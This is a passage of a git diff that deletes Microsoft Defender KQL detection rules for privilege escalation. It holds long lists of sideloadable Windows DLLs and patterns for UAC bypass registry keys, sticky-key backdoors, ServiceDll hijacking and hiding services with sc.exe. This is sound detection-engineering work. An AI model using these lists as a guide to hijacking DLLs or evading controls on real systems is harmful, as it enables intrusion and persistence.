endswith "\\wwapi.dll" or FolderPath endswith "\\xmllite.dll" or FolderPath endswith "\\xolehlp.dll" or FolderPath endswith "\\xwizards.dll" or FolderPath endswith "\\xwtpw32.dll" or FolderPath endswith "\\aclui.dll" or FolderPath endswith "\\bderepair.dll" or FolderPath endswith "\\bootmenuux.dll" or FolderPath endswith "\\dcntel.dll" or FolderPath endswith "\\dwmcore.dll" or FolderPath endswith "\\dynamoapi.dll" or FolderPath endswith "\\fhsvcctl.dll" or FolderPath endswith "\\fxsst.dll" or FolderPath endswith "\\inproclogger.dll" or FolderPath endswith "\\iumbase.dll" or FolderPath endswith "\\kdstub.dll" or FolderPath endswith "\\maintenanceui.dll" or FolderPath endswith "\\mdmdiagnostics.dll" or FolderPath endswith "\\mintdh.dll" or FolderPath endswith "\\msdtctm.dll" or FolderPath endswith "\\nettrace.dll" or FolderPath endswith "\\osksupport.dll" or FolderPath endswith "\\reseteng.dll" or FolderPath endswith "\\resetengine.dll" or FolderPath endswith "\\spectrumsyncclient.dll" or FolderPath endswith "\\srcore.dll" or FolderPath endswith "\\systemsettingsthresholdadminflowui.dll" or FolderPath endswith "\\timesync.dll" or FolderPath endswith "\\upshared.dll" or FolderPath endswith "\\wmpdui.dll" or FolderPath endswith "\\wwancfg.dll" or FolderPath endswith "\\dpx.dll" or FolderPath endswith "\\fxsapi.dll" or FolderPath endswith "\\fxstiff.dll" or FolderPath endswith "\\xpsservices.dll" or FolderPath endswith "\\appvpolicy.dll" or FolderPath endswith "\\batmeter.dll" or FolderPath endswith "\\bootux.dll" or FolderPath endswith "\\cmutil.dll" or FolderPath endswith "\\configmanager2.dll" or FolderPath endswith "\\coredplus.dll" or FolderPath endswith "\\coreuicomponents.dll" or FolderPath endswith "\\cryptsp.dll" or FolderPath endswith "\\dmcommandlineutils.dll" or FolderPath endswith "\\drvstore.dll" or FolderPath endswith "\\dsprop.dll" or FolderPath endswith "\\dxcore.dll" or FolderPath endswith "\\edgeiso.dll" or FolderPath endswith "\\framedynos.dll" or FolderPath endswith "\\fveskybackup.dll" or FolderPath endswith "\\fvewiz.dll" or FolderPath endswith "\\gpapi.dll" or FolderPath endswith "\\icmp.dll" or FolderPath endswith "\\ifsutil.dll" or FolderPath endswith "\\iumsdk.dll" or FolderPath endswith "\\lockhostingframework.dll" or FolderPath endswith "\\lrwizdll.dll" or FolderPath endswith "\\mbaexmlparser.dll" or FolderPath endswith "\\mfc42u.dll" or FolderPath endswith "\\msiso.dll" or FolderPath endswith "\\msvcp110_win.dll" or FolderPath endswith "\\netapi32.dll" or FolderPath endswith "\\netjoin.dll" or FolderPath endswith "\\netprovfw.dll" or FolderPath endswith "\\opcservices.dll" or FolderPath endswith "\\pkeyhelper.dll" or FolderPath endswith "\\playsndsrv.dll" or FolderPath endswith "\\powrprof.dll" or FolderPath endswith "\\prntvpt.dll" or FolderPath endswith "\\profapi.dll" or FolderPath endswith "\\proximitycommon.dll" or FolderPath endswith "\\proximityservicepal.dll" or FolderPath endswith "\\rasdlg.dll" or FolderPath endswith "\\security.dll" or FolderPath endswith "\\sppcext.dll" or FolderPath endswith "\\srmtrace.dll" or FolderPath endswith "\\tpmcoreprovisioning.dll" or FolderPath endswith "\\umpdc.dll" or FolderPath endswith "\\unattend.dll" or FolderPath endswith "\\urlmon.dll" or FolderPath endswith "\\vdsutil.dll" or FolderPath endswith "\\version.dll" or FolderPath endswith "\\winbio.dll" or FolderPath endswith "\\windows.ui.immersive.dll" or FolderPath endswith "\\winscard.dll" or FolderPath endswith "\\winsync.dll" or FolderPath endswith "\\wscapi.dll" or FolderPath endswith "\\wsmsvc.dll" or FolderPath endswith "\\FxsCompose.dll" or FolderPath endswith "\\WfsR.dll" or FolderPath endswith "\\rpchttp.dll" or FolderPath endswith "\\storageusage.dll" or FolderPath endswith "\\amsi.dll" or FolderPath endswith "\\PrintIsolationProxy.dll" or FolderPath endswith "\\msdtcVSp1res.dll" or FolderPath endswith "\\rdpendp.dll" or FolderPath endswith "\\dxilconv.dll" or FolderPath endswith "\\utcutil.dll" or FolderPath endswith "\\appraiser.dll" or FolderPath endswith "\\dsound.dll" or FolderPath endswith "\\DispBroker.dll" or FolderPath endswith "\\FXSRESM.DLL" or FolderPath endswith "\\cryptnet.dll" or FolderPath endswith "\\COMRES.DLL" or FolderPath endswith "\\igdumdim64.dll" or FolderPath endswith "\\igd10iumd64.dll" or FolderPath endswith "\\igd12umd64.dll" or FolderPath endswith "\\igdusc64.dll" or FolderPath endswith "\\WLBSCTRL.dll" or FolderPath endswith "\\TSMSISrv.dll" or FolderPath endswith "\\TSVIPSrv.dll" or FolderPath endswith "\\wow64log.dll" or FolderPath endswith "\\WptsExtensions.dll" or FolderPath endswith "\\wbemcomn.dll") and (not(((FolderPath contains "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\" and FolderPath endswith "\\version.dll") or (FolderPath endswith "\\cscui.dll" and FolderPath startswith "C:\\Windows\\Microsoft.NET\\") or (FolderPath contains "C:\\$WINDOWS.~BT\\" or FolderPath contains "C:\\$WinREAgent\\" or FolderPath contains "C:\\Windows\\SoftwareDistribution\\" or FolderPath contains "C:\\Windows\\System32\\" or FolderPath contains "C:\\Windows\\SystemTemp\\" or FolderPath contains "C:\\Windows\\SysWOW64\\" or FolderPath contains "C:\\Windows\\WinSxS\\")))) and (not(((FolderPath contains "C:\\Program Files\\Arsenal-Image-Mounter-" and (FolderPath endswith "\\mi.dll" or FolderPath endswith "\\miutils.dl")) or FolderPath contains "C:\\Packages\\Plugins\\Microsoft.GuestConfiguration.ConfigurationforWindows\\" or ((FolderPath contains "C:\\Program Files\\CheckPoint\\" or FolderPath contains "C:\\Program Files (x86)\\CheckPoint\\") and FolderPath endswith "\\PolicyManager.dll" and (InitiatingProcessFolderPath contains "C:\\Program Files\\CheckPoint\\" or InitiatingProcessFolderPath contains "C:\\Program Files (x86)\\CheckPoint\\") and InitiatingProcessFolderPath endswith "\\SmartConsole.exe") or (FolderPath contains ":\\Program Files\\WindowsApps\\DellInc.DellSupportAssistforPCs" and (InitiatingProcessFolderPath contains "C:\\Program Files\\WindowsApps\\DellInc.DellSupportAssistforPCs" or InitiatingProcessFolderPath contains "C:\\Windows\\System32\\backgroundTaskHost.exe")) or (InitiatingProcessFolderPath contains "C:\\Program Files\\WindowsApps\\DellInc.DellSupportAssistforPCs" and InitiatingProcessFolderPath endswith "\\wldp.dll") or (FolderPath contains "C:\\Program Files\\Microsoft\\Exchange Server\\" and FolderPath endswith "\\mswb7.dll") or (FolderPath endswith "C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVPolicy.dll" and InitiatingProcessFolderPath endswith "C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeClickToRun.exe")))) \ No newline at end of file diff --git a/Privilege Escalation/Potential_UAC_Bypass_Via_Sdclt.EXE.kql b/Privilege Escalation/Potential_UAC_Bypass_Via_Sdclt.EXE.kql deleted file mode 100644 index cb5229ea..00000000 --- a/Privilege Escalation/Potential_UAC_Bypass_Via_Sdclt.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) -// Date: 2020/05/02 -// Level: medium -// Description: A General detection for sdclt being spawned as an elevated process. This could be an indicator of sdclt being used for bypass UAC techniques. -// Tags: attack.privilege_escalation, attack.defense_evasion, attack.t1548.002 -DeviceProcessEvents -| where FolderPath endswith "sdclt.exe" and ProcessIntegrityLevel =~ "High" \ No newline at end of file diff --git a/Privilege Escalation/Potential_Vivaldi_elf.DLL_Sideloading.kql b/Privilege Escalation/Potential_Vivaldi_elf.DLL_Sideloading.kql deleted file mode 100644 index da809f2c..00000000 --- a/Privilege Escalation/Potential_Vivaldi_elf.DLL_Sideloading.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: X__Junior (Nextron Systems) -// Date: 2023/08/03 -// Level: medium -// Description: Detects potential DLL sideloading of "vivaldi_elf.dll" -// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002 -DeviceImageLoadEvents -| where FolderPath endswith "\\vivaldi_elf.dll" and (not((FolderPath contains "\\Vivaldi\\Application\\" and InitiatingProcessFolderPath endswith "\\Vivaldi\\Application\\vivaldi.exe"))) \ No newline at end of file diff --git a/Privilege Escalation/Potential_WWlib.DLL_Sideloading.kql b/Privilege Escalation/Potential_WWlib.DLL_Sideloading.kql deleted file mode 100644 index 4753e096..00000000 --- a/Privilege Escalation/Potential_WWlib.DLL_Sideloading.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: X__Junior (Nextron Systems) -// Date: 2023/05/18 -// Level: medium -// Description: Detects potential DLL sideloading of "wwlib.dll" -// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002 -DeviceImageLoadEvents -| where FolderPath endswith "\\wwlib.dll" and (not(((FolderPath startswith "C:\\Program Files (x86)\\Microsoft Office\\" or FolderPath startswith "C:\\Program Files\\Microsoft Office\\") and InitiatingProcessFolderPath endswith "\\winword.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft Office\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft Office\\")))) \ No newline at end of file diff --git a/Privilege Escalation/Potential_Waveedit.DLL_Sideloading.kql b/Privilege Escalation/Potential_Waveedit.DLL_Sideloading.kql deleted file mode 100644 index 77fc4544..00000000 --- a/Privilege Escalation/Potential_Waveedit.DLL_Sideloading.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: X__Junior (Nextron Systems) -// Date: 2023/06/14 -// Level: high -// Description: Detects potential DLL sideloading of "waveedit.dll", which is part of the Nero WaveEditor audio editing software. -// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002 -DeviceImageLoadEvents -| where FolderPath endswith "\\waveedit.dll" and (not(((InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Nero\\Nero Apps\\Nero WaveEditor\\waveedit.exe", "C:\\Program Files\\Nero\\Nero Apps\\Nero WaveEditor\\waveedit.exe")) and (FolderPath startswith "C:\\Program Files (x86)\\Nero\\Nero Apps\\Nero WaveEditor\\" or FolderPath startswith "C:\\Program Files\\Nero\\Nero Apps\\Nero WaveEditor\\")))) \ No newline at end of file diff --git a/Privilege Escalation/Potential_Wazuh_Security_Platform_DLL_Sideloading.kql b/Privilege Escalation/Potential_Wazuh_Security_Platform_DLL_Sideloading.kql deleted file mode 100644 index 224f54fb..00000000 --- a/Privilege Escalation/Potential_Wazuh_Security_Platform_DLL_Sideloading.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: X__Junior (Nextron Systems) -// Date: 2023/03/13 -// Level: medium -// Description: Detects potential DLL side loading of DLLs that are part of the Wazuh security platform -// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002 -DeviceImageLoadEvents -| where (FolderPath endswith "\\libwazuhshared.dll" or FolderPath endswith "\\libwinpthread-1.dll") and (not((FolderPath startswith "C:\\Program Files\\" or FolderPath startswith "C:\\Program Files (x86)\\"))) and (not(((FolderPath contains "\\AppData\\Local\\" or FolderPath contains "\\ProgramData\\") and FolderPath endswith "\\mingw64\\bin\\libwinpthread-1.dll"))) \ No newline at end of file diff --git a/Privilege Escalation/Potential_appverifUI.DLL_Sideloading.kql b/Privilege Escalation/Potential_appverifUI.DLL_Sideloading.kql deleted file mode 100644 index fa40db7c..00000000 --- a/Privilege Escalation/Potential_appverifUI.DLL_Sideloading.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: X__Junior (Nextron Systems) -// Date: 2023/06/20 -// Level: high -// Description: Detects potential DLL sideloading of "appverifUI.dll" -// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002 -DeviceImageLoadEvents -| where FolderPath endswith "\\appverifUI.dll" and (not(((InitiatingProcessFolderPath in~ ("C:\\Windows\\SysWOW64\\appverif.exe", "C:\\Windows\\System32\\appverif.exe")) and (FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Windows\\WinSxS\\")))) \ No newline at end of file diff --git a/Privilege Escalation/Potentially_Suspicious_Child_Process_of_KeyScrambler.exe.kql b/Privilege Escalation/Potentially_Suspicious_Child_Process_of_KeyScrambler.exe.kql deleted file mode 100644 index a30d1353..00000000 --- a/Privilege Escalation/Potentially_Suspicious_Child_Process_of_KeyScrambler.exe.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Swachchhanda Shrawan Poudel -// Date: 2024/05/13 -// Level: medium -// Description: Detects potentially suspicious child processes of KeyScrambler.exe -// Tags: attack.execution, attack.defense_evasion, attack.privilege_escalation, attack.t1203, attack.t1574.002 -DeviceProcessEvents -| where ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wscript.exe") or (ProcessVersionInfoOriginalFileName in~ ("Cmd.Exe", "cscript.exe", "mshta.exe", "PowerShell.EXE", "pwsh.dll", "regsvr32.exe", "RUNDLL32.EXE", "wscript.exe"))) and InitiatingProcessFolderPath endswith "\\KeyScrambler.exe" \ No newline at end of file diff --git a/Privilege Escalation/Potentially_Suspicious_Event_Viewer_Child_Process.kql b/Privilege Escalation/Potentially_Suspicious_Event_Viewer_Child_Process.kql deleted file mode 100644 index 0897182f..00000000 --- a/Privilege Escalation/Potentially_Suspicious_Event_Viewer_Child_Process.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2017/03/19 -// Level: high -// Description: Detects uncommon or suspicious child processes of "eventvwr.exe" which might indicate a UAC bypass attempt -// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002, car.2019-04-001 -DeviceProcessEvents -| where InitiatingProcessFolderPath endswith "\\eventvwr.exe" and (not((FolderPath endswith ":\\Windows\\System32\\mmc.exe" or FolderPath endswith ":\\Windows\\System32\\WerFault.exe" or FolderPath endswith ":\\Windows\\SysWOW64\\WerFault.exe"))) \ No newline at end of file diff --git a/Privilege Escalation/PowerShell_Profile_Modification.kql b/Privilege Escalation/PowerShell_Profile_Modification.kql deleted file mode 100644 index cfccee4d..00000000 --- a/Privilege Escalation/PowerShell_Profile_Modification.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: HieuTT35, Nasreddine Bencherchali (Nextron Systems) -// Date: 2019/10/24 -// Level: medium -// Description: Detects the creation or modification of a powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence -// Tags: attack.persistence, attack.privilege_escalation, attack.t1546.013 -DeviceFileEvents -| where FolderPath endswith "\\Microsoft.PowerShell_profile.ps1" or FolderPath endswith "\\PowerShell\\profile.ps1" or FolderPath endswith "\\Program Files\\PowerShell\\7-preview\\profile.ps1" or FolderPath endswith "\\Program Files\\PowerShell\\7\\profile.ps1" or FolderPath endswith "\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1" or FolderPath endswith "\\WindowsPowerShell\\profile.ps1" \ No newline at end of file diff --git a/Privilege Escalation/Powerup_Write_Hijack_DLL.kql b/Privilege Escalation/Powerup_Write_Hijack_DLL.kql deleted file mode 100644 index b2cd19b0..00000000 --- a/Privilege Escalation/Powerup_Write_Hijack_DLL.kql +++ /dev/null @@ -1,10 +0,0 @@ -// Author: Subhash Popuri (@pbssubhash) -// Date: 2021/08/21 -// Level: high -// Description: Powerup tool's Write Hijack DLL exploits DLL hijacking for privilege escalation. -In it's default mode, it builds a self deleting .bat file which executes malicious command. -The detection rule relies on creation of the malicious bat file (debug.bat by default). - -// Tags: attack.persistence, attack.privilege_escalation, attack.defense_evasion, attack.t1574.001 -DeviceFileEvents -| where (InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe") and FolderPath endswith ".bat" \ No newline at end of file diff --git a/Privilege Escalation/Process_Creation_Using_Sysnative_Folder.kql b/Privilege Escalation/Process_Creation_Using_Sysnative_Folder.kql deleted file mode 100644 index f767153d..00000000 --- a/Privilege Escalation/Process_Creation_Using_Sysnative_Folder.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Max Altgelt (Nextron Systems) -// Date: 2022/08/23 -// Level: medium -// Description: Detects process creation events that use the Sysnative folder (common for CobaltStrike spawns) -// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1055 -DeviceProcessEvents -| where ProcessCommandLine contains ":\\Windows\\Sysnative\\" or FolderPath contains ":\\Windows\\Sysnative\\" \ No newline at end of file diff --git a/Privilege Escalation/Process_Explorer_Driver_Creation_By_Non-Sysinternals_Binary.kql b/Privilege Escalation/Process_Explorer_Driver_Creation_By_Non-Sysinternals_Binary.kql deleted file mode 100644 index db3f32f1..00000000 --- a/Privilege Escalation/Process_Explorer_Driver_Creation_By_Non-Sysinternals_Binary.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2023/05/05 -// Level: high -// Description: Detects creation of the Process Explorer drivers by processes other than Process Explorer (procexp) itself. -Hack tools or malware may use the Process Explorer driver to elevate privileges, drops it to disk for a few moments, runs a service using that driver and removes it afterwards. - -// Tags: attack.persistence, attack.privilege_escalation, attack.t1068 -DeviceFileEvents -| where (FolderPath contains "\\PROCEXP" and FolderPath endswith ".sys") and (not((InitiatingProcessFolderPath endswith "\\procexp.exe" or InitiatingProcessFolderPath endswith "\\procexp64.exe"))) \ No newline at end of file diff --git a/Privilege Escalation/Process_Monitor_Driver_Creation_By_Non-Sysinternals_Binary.kql b/Privilege Escalation/Process_Monitor_Driver_Creation_By_Non-Sysinternals_Binary.kql deleted file mode 100644 index c6201772..00000000 --- a/Privilege Escalation/Process_Monitor_Driver_Creation_By_Non-Sysinternals_Binary.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/05/05 -// Level: medium -// Description: Detects creation of the Process Monitor driver by processes other than Process Monitor (procmon) itself. -// Tags: attack.persistence, attack.privilege_escalation, attack.t1068 -DeviceFileEvents -| where (FolderPath contains "\\procmon" and FolderPath endswith ".sys") and (not((InitiatingProcessFolderPath endswith "\\procmon.exe" or InitiatingProcessFolderPath endswith "\\procmon64.exe"))) \ No newline at end of file diff --git a/Privilege Escalation/Regedit_as_Trusted_Installer.kql b/Privilege Escalation/Regedit_as_Trusted_Installer.kql deleted file mode 100644 index a45472ea..00000000 --- a/Privilege Escalation/Regedit_as_Trusted_Installer.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2021/05/27 -// Level: high -// Description: Detects a regedit started with TrustedInstaller privileges or by ProcessHacker.exe -// Tags: attack.privilege_escalation, attack.t1548 -DeviceProcessEvents -| where FolderPath endswith "\\regedit.exe" and (InitiatingProcessFolderPath endswith "\\TrustedInstaller.exe" or InitiatingProcessFolderPath endswith "\\ProcessHacker.exe") \ No newline at end of file diff --git a/Privilege Escalation/Renamed_Mavinject.EXE_Execution.kql b/Privilege Escalation/Renamed_Mavinject.EXE_Execution.kql deleted file mode 100644 index e67eb044..00000000 --- a/Privilege Escalation/Renamed_Mavinject.EXE_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113, Florian Roth -// Date: 2022/12/05 -// Level: high -// Description: Detects the execution of a renamed version of the "Mavinject" process. Which can be abused to perform process injection using the "/INJECTRUNNING" flag -// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1055.001, attack.t1218.013 -DeviceProcessEvents -| where (ProcessVersionInfoOriginalFileName in~ ("mavinject32.exe", "mavinject64.exe")) and (not((FolderPath endswith "\\mavinject32.exe" or FolderPath endswith "\\mavinject64.exe"))) \ No newline at end of file diff --git a/Privilege Escalation/Rundll32_Registered_COM_Objects.kql b/Privilege Escalation/Rundll32_Registered_COM_Objects.kql deleted file mode 100644 index 314c9c8a..00000000 --- a/Privilege Escalation/Rundll32_Registered_COM_Objects.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/02/13 -// Level: high -// Description: load malicious registered COM objects -// Tags: attack.privilege_escalation, attack.persistence, attack.t1546.015 -DeviceProcessEvents -| where ((ProcessCommandLine contains "-sta " or ProcessCommandLine contains "-localserver ") and (ProcessCommandLine contains "{" and ProcessCommandLine contains "}")) and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE") \ No newline at end of file diff --git a/Privilege Escalation/Scheduled_Task_Creation_Via_Schtasks.EXE.kql b/Privilege Escalation/Scheduled_Task_Creation_Via_Schtasks.EXE.kql deleted file mode 100644 index 0ea2e752..00000000 --- a/Privilege Escalation/Scheduled_Task_Creation_Via_Schtasks.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2019/01/16 -// Level: low -// Description: Detects the creation of scheduled tasks by user accounts via the "schtasks" utility. -// Tags: attack.execution, attack.persistence, attack.privilege_escalation, attack.t1053.005, attack.s0111, car.2013-08-001, stp.1u -DeviceProcessEvents -| where (ProcessCommandLine contains " /create " and FolderPath endswith "\\schtasks.exe") and (not((AccountName contains "AUTHORI" or AccountName contains "AUTORI"))) \ No newline at end of file diff --git a/Privilege Escalation/Sdclt_Child_Processes.kql b/Privilege Escalation/Sdclt_Child_Processes.kql deleted file mode 100644 index 40ba4dfa..00000000 --- a/Privilege Escalation/Sdclt_Child_Processes.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) -// Date: 2020/05/02 -// Level: medium -// Description: A General detection for sdclt spawning new processes. This could be an indicator of sdclt being used for bypass UAC techniques. -// Tags: attack.privilege_escalation, attack.t1548.002 -DeviceProcessEvents -| where InitiatingProcessFolderPath endswith "\\sdclt.exe" \ No newline at end of file diff --git a/Privilege Escalation/Security_Privileges_Enumeration_Via_Whoami.EXE.kql b/Privilege Escalation/Security_Privileges_Enumeration_Via_Whoami.EXE.kql deleted file mode 100644 index 7cd541b4..00000000 --- a/Privilege Escalation/Security_Privileges_Enumeration_Via_Whoami.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2021/05/05 -// Level: high -// Description: Detects a whoami.exe executed with the /priv command line flag instructing the tool to show all current user privileges. This is often used after a privilege escalation attempt. -// Tags: attack.privilege_escalation, attack.discovery, attack.t1033 -DeviceProcessEvents -| where (ProcessCommandLine contains " /priv" or ProcessCommandLine contains " -priv") and (FolderPath endswith "\\whoami.exe" or ProcessVersionInfoOriginalFileName =~ "whoami.exe") \ No newline at end of file diff --git a/Privilege Escalation/ServiceDll_Hijack.kql b/Privilege Escalation/ServiceDll_Hijack.kql deleted file mode 100644 index fb9f8be0..00000000 --- a/Privilege Escalation/ServiceDll_Hijack.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: frack113 -// Date: 2022/02/04 -// Level: medium -// Description: Detects changes to the "ServiceDLL" value related to a service in the registry. -This is often used as a method of persistence. - -// Tags: attack.persistence, attack.privilege_escalation, attack.t1543.003 -DeviceRegistryEvents -| where ((RegistryKey contains "\\System" and RegistryKey contains "ControlSet" and RegistryKey contains "\\Services") and RegistryKey endswith "\\Parameters\\ServiceDll") and (not(((RegistryValueData =~ "%%systemroot%%\\system32\\ntdsa.dll" and InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\lsass.exe" and RegistryKey endswith "\\Services\\NTDS\\Parameters\\ServiceDll") or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\poqexec.exe" or RegistryValueData =~ "C:\\Windows\\system32\\spool\\drivers\\x64\\3\\PrintConfig.dll"))) and (not((RegistryValueData =~ "C:\\Windows\\System32\\STAgent.dll" and InitiatingProcessFolderPath endswith "\\regsvr32.exe"))) \ No newline at end of file diff --git a/Privilege Escalation/Service_DACL_Abuse_To_Hide_Services_Via_Sc.EXE.kql b/Privilege Escalation/Service_DACL_Abuse_To_Hide_Services_Via_Sc.EXE.kql deleted file mode 100644 index 04c45340..00000000 --- a/Privilege Escalation/Service_DACL_Abuse_To_Hide_Services_Via_Sc.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Andreas Hunkeler (@Karneades) -// Date: 2021/12/20 -// Level: high -// Description: Detects usage of the "sc.exe" utility adding a new service with special permission seen used by threat actors which makes the service hidden and unremovable. -// Tags: attack.persistence, attack.defense_evasion, attack.privilege_escalation, attack.t1574.011 -DeviceProcessEvents -| where (ProcessCommandLine contains "sdset" and ProcessCommandLine contains "DCLCWPDTSD") and (FolderPath endswith "\\sc.exe" or ProcessVersionInfoOriginalFileName =~ "sc.exe") \ No newline at end of file diff --git a/Privilege Escalation/Service_Security_Descriptor_Tampering_Via_Sc.EXE.kql b/Privilege Escalation/Service_Security_Descriptor_Tampering_Via_Sc.EXE.kql deleted file mode 100644 index a2adcfc1..00000000 --- a/Privilege Escalation/Service_Security_Descriptor_Tampering_Via_Sc.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/02/28 -// Level: medium -// Description: Detection of sc.exe utility adding a new service with special permission which hides that service. -// Tags: attack.persistence, attack.defense_evasion, attack.privilege_escalation, attack.t1574.011 -DeviceProcessEvents -| where ProcessCommandLine contains "sdset" and (FolderPath endswith "\\sc.exe" or ProcessVersionInfoOriginalFileName =~ "sc.exe") \ No newline at end of file diff --git a/Privilege Escalation/Shell_Open_Registry_Keys_Manipulation.kql b/Privilege Escalation/Shell_Open_Registry_Keys_Manipulation.kql deleted file mode 100644 index 3d4deb59..00000000 --- a/Privilege Escalation/Shell_Open_Registry_Keys_Manipulation.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Christian Burkard (Nextron Systems) -// Date: 2021/08/30 -// Level: high -// Description: Detects the shell open key manipulation (exefile and ms-settings) used for persistence and the pattern of UAC Bypass using fodhelper.exe, computerdefaults.exe, slui.exe via registry keys (e.g. UACMe 33 or 62) -// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002, attack.t1546.001 -DeviceRegistryEvents -| where (RegistryValueData contains "\\Software\\Classes\\{" and ActionType =~ "RegistryValueSet" and RegistryKey endswith "Classes\\ms-settings\\shell\\open\\command\\SymbolicLinkValue") or RegistryKey endswith "Classes\\ms-settings\\shell\\open\\command\\DelegateExecute" or ((ActionType =~ "RegistryValueSet" and (RegistryKey endswith "Classes\\ms-settings\\shell\\open\\command\\(Default)" or RegistryKey endswith "Classes\\exefile\\shell\\open\\command\\(Default)")) and (not(RegistryValueData =~ "(Empty)"))) \ No newline at end of file diff --git a/Privilege Escalation/Shell_Process_Spawned_by_Java.EXE.kql b/Privilege Escalation/Shell_Process_Spawned_by_Java.EXE.kql deleted file mode 100644 index 534b99c8..00000000 --- a/Privilege Escalation/Shell_Process_Spawned_by_Java.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Andreas Hunkeler (@Karneades), Nasreddine Bencherchali -// Date: 2021/12/17 -// Level: medium -// Description: Detects shell spawned from Java host process, which could be a sign of exploitation (e.g. log4j exploitation) -// Tags: attack.initial_access, attack.persistence, attack.privilege_escalation -DeviceProcessEvents -| where ((FolderPath endswith "\\bash.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") and InitiatingProcessFolderPath endswith "\\java.exe") and (not((ProcessCommandLine contains "build" and InitiatingProcessFolderPath contains "build"))) \ No newline at end of file diff --git a/Privilege Escalation/Sticky_Key_Like_Backdoor_Execution.kql b/Privilege Escalation/Sticky_Key_Like_Backdoor_Execution.kql deleted file mode 100644 index 0509bca7..00000000 --- a/Privilege Escalation/Sticky_Key_Like_Backdoor_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems), @twjackomo, Jonhnathan Ribeiro, oscd.community -// Date: 2018/03/15 -// Level: critical -// Description: Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen -// Tags: attack.privilege_escalation, attack.persistence, attack.t1546.008, car.2014-11-003, car.2014-11-008 -DeviceProcessEvents -| where (ProcessCommandLine contains "sethc.exe" or ProcessCommandLine contains "utilman.exe" or ProcessCommandLine contains "osk.exe" or ProcessCommandLine contains "Magnify.exe" or ProcessCommandLine contains "Narrator.exe" or ProcessCommandLine contains "DisplaySwitch.exe") and (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\wt.exe") and InitiatingProcessFolderPath endswith "\\winlogon.exe" \ No newline at end of file diff --git a/Privilege Escalation/Sticky_Key_Like_Backdoor_Usage_-_Registry.kql b/Privilege Escalation/Sticky_Key_Like_Backdoor_Usage_-_Registry.kql deleted file mode 100644 index 0a1e634c..00000000 --- a/Privilege Escalation/Sticky_Key_Like_Backdoor_Usage_-_Registry.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems), @twjackomo, Jonhnathan Ribeiro, oscd.community -// Date: 2018/03/15 -// Level: critical -// Description: Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen -// Tags: 